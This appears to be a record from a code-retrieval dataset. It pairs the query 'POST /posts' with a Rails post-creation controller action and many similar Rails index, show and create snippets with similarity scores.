"def index\n\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def show\n \n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n render json: { posts: Post.all }\n end",
"def show\n @post ||= Mist::Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n @posts = Post.order(\"created_at DESC\").includes(:user)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n # when you go to http://localhost:3000/posts/1, rails interprets this\n # as a call to the show action for the resource and passes 1 to the \n # :id paramater. Using this blog app you can do that by clicking the \n # show link for a post on the index page.\n\n @post = Post.find(params[:id])\n # The show action uses Post.find to search for a single record \n # in the database by its id value. After finding the record, Rails \n # displays it by using app/views/posts/show.html.erb\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n post = Post.find_by(id: params[:id])\n if post \n render json: post\n else\n render json: {errors: 'Not found'}\n end\n end",
"def index\n render json: Post.all\n end",
"def index\n @posts = Mist::Post.recently_published(20, Mist.authorized?(:view_drafts, self))\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def index\n @posts = Post.all.order(created_at: :asc)\n json_response(@posts)\n end",
"def index\n @posts = Post.all\n \n render json: @posts\n end",
"def show\n @post = Post.find(params[:id])\n \n respond_to do |format|\n format.html { render 'application/index' }\n format.json { render :json => { :post => @post.as_json } }\n end\n end",
"def show\n render json: @post, serializer: Api::V1::PostSerializer\n end",
"def show\r\n @post = root_post_of(Post.find(params[:id]))\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @post }\r\n end\r\n end",
"def show\n render json: @post\n end",
"def show\n @api_v2_post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @api_v2_post }\n end\n end",
"def show\n render json: @post\n end",
"def index\n @posts = Post.paginate(:page => params[:page], :per_page => 10).order('id DESC')\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.atom\n end\n end",
"def index\n render json: Post.all.order(id: :desc), each_serializer: V1::Posts::PostSerializer\n end",
"def show\n render :json => @post\n end",
"def index\n # @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n # format.json { render json: @posts }\n end\n end",
"def index\n @api_v1_posts = Api::V1::Post.all\n end",
"def show\n @post = Post.find(params[:id])\n render json: @post, meta: { status: :ok }, meta_key: 'result'\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render jsonapi: @post }\n end\n end",
"def show\n @posts = @game.posts.order(created_at: :desc).paginate(page: params[:page], per_page: 5)\n respond_to do |format|\n format.json { render template: 'api/games/game.json' }\n end\n end",
"def show\n @post = PostsService.getPostById(params[:id])\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.json { render json: @post }\n format.xml { render xml: @posts }\n end\n end",
"def index\n #@posts = Post.all\n @posts = Post.paginate( :page => params[:page],\n :per_page => 2\n )\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n # Post.all returns all of the posts currently in the \n # database as an array of Post records that we store \n # in an instance variable called @posts.\n # http://guides.rubyonrails.org/active_record_querying.html\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n # The respond_to block handles both HTML and JSON calls \n # to this action. If you browse to \n # http://localhost:3000/posts.json, you’ll see a JSON \n # containing all of the posts. \n end",
"def index\n\n # We display the posts be cronological inverted order\n if authenticated?\n @posts = Post.order('created_at DESC').page(params[:page])\n else\n @posts = Post.order('created_at DESC').where(:status => :true).page(params[:page])\n end\n \n respond_to do |format|\n format.html { render html: @posts }\n format.json { render json: @posts }\n end\n end",
"def show\n @user = User.find(params[:id])\n @posts = @user.posts\n\n respond_to do |format|\n format.json { render json: {user: User._build(@user), posts: Post.build_posts(@posts)}, location: root_path }\n end\n end",
"def index\n\t\tgon.posts = Post.all.as_json\n\tend",
"def index\n @posts = Post.order(\"created_at DESC\").where(:published => true).limit(5)\n @title = \"Home\"\n @description = \"the blog and website of bassist and programmer Johnny Grubb. no baseball information here.\"\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml\n end\n end",
"def display_posts\n begin\n response = RestClient.get \"#{@@DOMAIN}/api/posts.json?all\", authorization_hash\n\n puts \"Response code: #{response.code}\"\n puts \"Response cookies:\\n #{response.cookies}\\n\\n\"\n puts \"Response headers:\\n #{response.headers}\\n\\n\"\n puts \"Response content:\\n #{response.to_str}\"\n\n js = JSON response.body\n js.each do |item_hash|\n item_hash.each do |k, v|\n puts \"#{k}: #{v}\"\n end\n end\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def show\n #@post = Post.find(params[:id])\n\n #respond_to do |format|\n # format.html # show.html.erb\n #format.json { render json: @post }\n #end\n end",
"def index\n @posts = Post.all\n @posts = paginate(@posts)\n authorize @posts\n\n render json: @posts, each_serializer: Api::V1::PostSerializer, meta: meta_attributes(@posts)\n end",
"def index\n @posts = Post.find(:all)\n end",
"def show\n @post = current_user.posts.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n render json: { posts: current_user.posts.all.map(&:to_h) }\n end",
"def show\n @feed = Feed.find(params[:id])\n @posts = @feed.posts.order(\"published desc\").paginate(:page => params[:page], :per_page => 20)\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def index\n\t@posts = list_posts\n end",
"def show\n #GET a single post by ID\n @post = Post.find(params[:id])\n end",
"def posts(opts)\n response = get(\"posts\", opts)\n response\n end",
"def show\n @post = Post.find(params[:id])\n @title = @post.title\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n # TODO: implement listing all posts\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml { render xml: @posts }\n end\n end",
"def show\n @blogpost = Blogpost.published.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @blogpost }\n end\n end",
"def show\n # @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n # format.json { render json: @post }\n end\n end",
"def post(postid)\n request(:id => postid).posts.first\n end",
"def show\n Rails.logger.debug(\"Inside show \")\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @posto = Posto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @posto }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n #format.json { render json: @post }\n format.json do\n render :json => @post.to_json(:only => [:id, :title, :text, :lat, :lng, :created_at, :post_type, :likes], \n :methods => [:image_url, :video_url], \n :include => [:comments])\n end\n end\n end",
"def display_post\n begin\n # asks the user for the post id\n print \"Enter the post ID: \"\n id = STDIN.gets.chomp\n response = RestClient.get \"#{@@DOMAIN}/api/posts/#{id}.json\", authorization_hash\n\n js = JSON response.body\n js.each do |k, v|\n puts \"#{k}: #{v}\"\n end\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def index\n @posts = Post.all.reverse\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = PostService.getAllPosts\n end",
"def show\n render json: {\n data: @post\n }\n end",
"def show\n @post = Post.find(params[:id])\n @videos = Video.get_for @post #where([\"post_id = ?\", params[:id]]).all\n @background = get_background_for @post #Background::DEFAULT #Background.where([\"post_id = ?\", params[:id]])\n @nav = get_navigation :for => 'post', :current => @post\n @menu = get_menu :for => 'post'\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def index\n @posts = Post.order(created_at: :desc)\n respond_to do |format|\n format.html { render }\n format.text { render }\n format.xml { render xml: @posts }\n format.json { render json: @posts.to_json }\n end\n end",
"def get(options = {})\n response= handle_errors { self.class.get('/get', :query => options)}\n if response[\"posts\"][\"post\"].is_a?(Hash)\n Rubycious::Post.new response[\"posts\"][\"post\"]\n elsif response[\"posts\"][\"post\"].is_a?(Array)\n response[\"posts\"][\"post\"].collect{|i| Rubycious::Post.new(i)}\n else\n nil\n end\n end",
"def show\n if !params[:id]\n @post = Post.find_by_title('Welcome')\n elsif params[:id] =~ /^[a-zA-Z ]+$/\n @post = Post.find_by_title(params[:id])\n else\n @post = Post.find(params[:id].to_i)\n end\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @blogpost = Blogpost.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @blogpost }\n end\n end",
"def show\n @blog_post = BlogPost.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @blog_post }\n end\n end",
"def index\n @post = Post.find_by_id(params[:post_id])\n if @post.nil?\n return render json: { error: \"Post not found\" }, status: :not_found\n end\n render json: @post.comments,status: 200\n end",
"def show\n @post2 = Post2.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post2 }\n end\n end"
] |
[
"0.77110183",
"0.73537844",
"0.73433185",
"0.73379177",
"0.73228735",
"0.7293139",
"0.7275997",
"0.7256934",
"0.7161576",
"0.7158913",
"0.71552676",
"0.71552676",
"0.7119547",
"0.7094749",
"0.7094749",
"0.7094749",
"0.70943594",
"0.7071599",
"0.70607626",
"0.70452625",
"0.7032558",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.69897074",
"0.6955722",
"0.6955722",
"0.6954564",
"0.6937062",
"0.6936725",
"0.69257236",
"0.6917876",
"0.69010335",
"0.69005007",
"0.6894985",
"0.6893989",
"0.68756175",
"0.6860515",
"0.6853294",
"0.6853291",
"0.6847577",
"0.68364173",
"0.68232405",
"0.68093437",
"0.6804144",
"0.67621773",
"0.6743674",
"0.67226875",
"0.6720067",
"0.67147297",
"0.6713107",
"0.6699554",
"0.6693189",
"0.6679935",
"0.6655543",
"0.6644503",
"0.6641595",
"0.66299",
"0.6619761",
"0.66178924",
"0.66124725",
"0.6608166",
"0.66017526",
"0.6597235",
"0.65952027",
"0.65909946",
"0.65858185",
"0.6582703",
"0.658145",
"0.65768254",
"0.65733755",
"0.6568626",
"0.65668",
"0.655592",
"0.65385455",
"0.6525845",
"0.65144473",
"0.6513119",
"0.6497587",
"0.6497312",
"0.6493223",
"0.6491053",
"0.64720887",
"0.6471776",
"0.64655757",
"0.6455566",
"0.64530945",
"0.6448596",
"0.64456475",
"0.64289075"
] |
0.0
|
-1
|
POST /posts POST /posts.json
|
def create
  @calendar = Calendar.find(params[:calendar_id])
  @event = Event.find(params[:event_id])
  # Build then save explicitly: `@event.posts.create(...)` returns the
  # record even when validation fails, so the original `if` branch was
  # always truthy and the error path was unreachable.
  @post = @event.posts.new(post_params)
  if @post.save
    redirect_to url_for([@calendar, @event]),
      notice: 'Post successfully created.'
  else
    # Pass the actual records, not the symbols :calendar/:event,
    # so the path helper can build a valid URL.
    redirect_to calendar_event_path(@calendar, @event),
      alert: 'Error creating post'
  end
end
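
# A minimal sketch of the nested routing implied by the helpers above
# (calendar_event_path, url_for([@calendar, @event])). The exact nesting
# is an assumption reconstructed from those helpers, not confirmed by
# the original app.
#
# config/routes.rb
Rails.application.routes.draw do
  resources :calendars do
    resources :events do
      resources :posts, only: [:create, :update]
    end
  end
end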
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n render json: Post.create(params[\"post\"])\n end",
"def create\n respond_with Post.create(params[:posts])\n end",
"def create\n @post = Post.create(post_params)\n render json: @post, serializer: PostSerializer\n end",
"def create\n @post = Post.new(post_params)\n @post.user = current_user\n\n if @post.save\n render json: @post, status: :created, location: api_v1_post_path(@post), serializer: Api::V1::PostSerializer\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = current_user.posts.new(post_params)\n\n if @post.save\n render json: {\n data: @post\n }\n else\n render json: {\n errors: @post.errors\n }\n end\n end",
"def create\n post = @current_user.posts.create(post_params)\n\n if post.save\n render json: post\n else\n render json: { errors: post.errors.full_messages }, status: :forbidden\n end\n end",
"def create\n title = params[:title]\n body = params[:body]\n\n @post = current_user.posts.create(title: title, body: body)\n\n if @post.save!\n json_response(@post)\n else\n json_response(@post.errors)\n end\n end",
"def create\n @post = Post.new({ :title => params[:post][:title] })\n \n respond_to do |format|\n if @post.save\n format.json { render :json => { :post => @post.as_json}, :status => :created, :location => @post }\n else\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @user = User.find(params[:user_id])\n @post = @user.posts.new(post_params)\n\n if @post.save\n render json: @post, status: :created, location: [@user, @post]\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = Post.new(post_params)\n\n if @post.save\n render json: {\n message: 'Post was successfully created.'\n }, status: :created\n else\n render json: {\n errors: @post.errors,\n message: 'Post could not be created.'\n }, status: :unprocessable_entity\n end\n end",
"def post(id, opts = {})\r\n uri = url_for(\"posts/#{id}\", opts)\r\n response = RestClient.get(uri)\r\n JSON.parse response\r\n end",
"def create\n\n\n @post = current_user.posts.build(post_params)\n\n if @post.save\n\n render json: \"Posted successfully\", status: 201\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = Post.new(params[:post])\n respond_to do |format|\n if @post.save\n format.json { render :json => @post }\n else\n format.json { render :json => @post.errors, :status => :unprocessable_entity}\n end\n end\n #respond_with Post.create(params[:post])\n end",
"def create\n\t\tpost = @current_user.posts.create(post_params) \n\t\tif post.save\n\t\trender json: {success: true, auth_token: @current_user.authentication_token, post_id: post.id}\n\t else\n\t render json: {success: false, errors: post.errors.full_messages, message: \"Validation failed\"}, status: 422\n\t\tend \n\tend",
"def create_posts\n end",
"def create_posts\n end",
"def create_post\n begin\n #asks the user for the title, body, and whether it should be anonymous\n print \"Title: \"\n title = STDIN.gets.chomp\n print \"Body: \"\n body = STDIN.gets.chomp\n print \"Post as Anonymous? (y/n): \"\n anonymous = STDIN.gets.chomp.upcase == 'Y' ? true : false\n # check user information from login\n\n # Rails will reject this unless you configure the cross_forgery_request check to\n # a null_session in the receiving controller. This is because we are not sending\n # an authenticity token. Rails by default will only send the token with forms /users/new and\n # /users/1/edit and REST clients don't get those.\n # We could perhaps arrange to send this on a previous\n # request but we would then have to have an initial call (a kind of login perhaps).\n # This will automatically send as a multi-part request because we are adding a\n # File object.\n response = RestClient.post \"#{@@DOMAIN}/api/posts.json\",\n\n {\n post: {\n title: title,\n body: body,\n anonymous: anonymous\n },\n }, authorization_hash\n\n if (response.code == 201)\n puts \"Created successfully\"\n end\n puts \"URL for new resource: #{response.headers[:location]}\"\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def create\n @api_post = Api::Post.new(api_post_params)\n\n if @api_post.save\n render json: @api_post, status: :created, location: @api_post\n else\n render json: @api_post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.json { render :show, status: :created, location: @post }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n \tif logged_in?\n params[:post][:user_id] = current_user.id\n @post = Post.new(post_params)\n if @post.save\n puts @post.published\n render json: @post\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end\n end",
"def create\n respond_with Post.create(post_params)\n end",
"def posts(opts)\n response = get(\"posts\", opts)\n response\n end",
"def post(*args)\n request(:post, *args)\n end",
"def post(*args)\n request :post, *args\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @api_post = current_user.posts.new(api_post_params)\n if @api_post.save\n render :show\n else\n render json: @api_post.errors, status: :unprocessable_entity\n end\n end",
"def create\n authenticated\n\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new post_params\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n if @post.save\n render :show, status: :created, location: @post\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n puts \"create post: #{post_params.inspect}\"\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n @title = \"Create New Post\"\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, :notice => 'Post was successfully created.' }\n format.json { render :json => @post, :status => :created, :location => @post }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def json_post\n @content_type = 'text/plain'\n @render_nothing = true\n @rendered_template = true\n @current_layout = nil\n puts \"json_post: submitting #{params[:path]}\" if @@debug\n path = params[:path]\n if path\n puts \"json_post: path is #{path} l=#{path.length}\" if @@debug\n path = path.split('/').compact()\n path.delete('')\n # you cannot make rooted nodes via json atm... fix? xxx\n if path.length > 1\n name = path.pop\n nodes = Note.make_path @user,path\n puts \"json_post: making at path #{path.join('/')}\" if @@debug\n if nodes\n note = nodes.last.make_child @user,params,name\n puts \"json_post: made child #{note} from #{name} l=#{name.length}\"\n params[:path] = path.join('/') # for call to json_query\n # it is important to do a query rather than returning the note; to get freshest order\n json_query\n return\n #write_json note if note\n end\n end\n end\n render :nothing => true\n end",
"def create\n post_service = PostService.new(current_user, params)\n post_service.create_post\n #post_service.create\n respond_to do |format|\n if post_service.save?\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { redirect_to new_post_url, alert: post_service.errors }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.json { render json: @post, status: :created, location: @post }\n format.xml { render xml: @post, status: :created, location: @post }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n format.xml { render xml: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #raise params.inspect\n \n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @posts = Post.page(params[:page]).order('created_at desc')\n @post = Post.new(post_params)\n @user = User.where('account_id == ?', current_account.id)[0]\n respond_to do |format|\n if @post.save\n format.html { redirect_to '/posts' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :index }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\t\t\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n user_post_param\n respond_to do |format|\n if @post.save\n format.html do\n redirect_to @post, notice:\n \"Post was successfully created.\"\n end\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json do\n render json: @post.errors, status:\n :unprocessable_entity\n end\n end\n end\n end",
"def create\n @api_v1_post = Api::V1::Post.new(api_v1_post_params)\n\n respond_to do |format|\n if @api_v1_post.save\n format.html { redirect_to @api_v1_post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @api_v1_post }\n else\n format.html { render :new }\n format.json { render json: @api_v1_post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = current_user.posts.new(params[:post])\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n @post.user_id = current_user.id\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { redirect_to posts_path, flash: { error: @post.errors.full_messages } }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def post(path, data = {})\n request 'POST', path, body: data.to_json\n end",
"def new\n post = Post.new\n render json: post\n end",
"def create\n @user = current_user\n @post = @user.posts.build(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save?\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: 'new' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: \"Post was successfully created.\" }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: \"Post was successfully created.\" }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\r\n @post = Post.new(params[:post])\r\n\r\n respond_to do |format|\r\n if @post.save\r\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\r\n format.json { render json: @post, status: :created, location: @post }\r\n else\r\n format.html { render action: \"new\" }\r\n format.json { render json: @post.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def create\n @post = Post.create(post_params)\n set_posts\n respond_to do |format|\n format.js\n format.html\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: \"Post was successfully created.\" }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
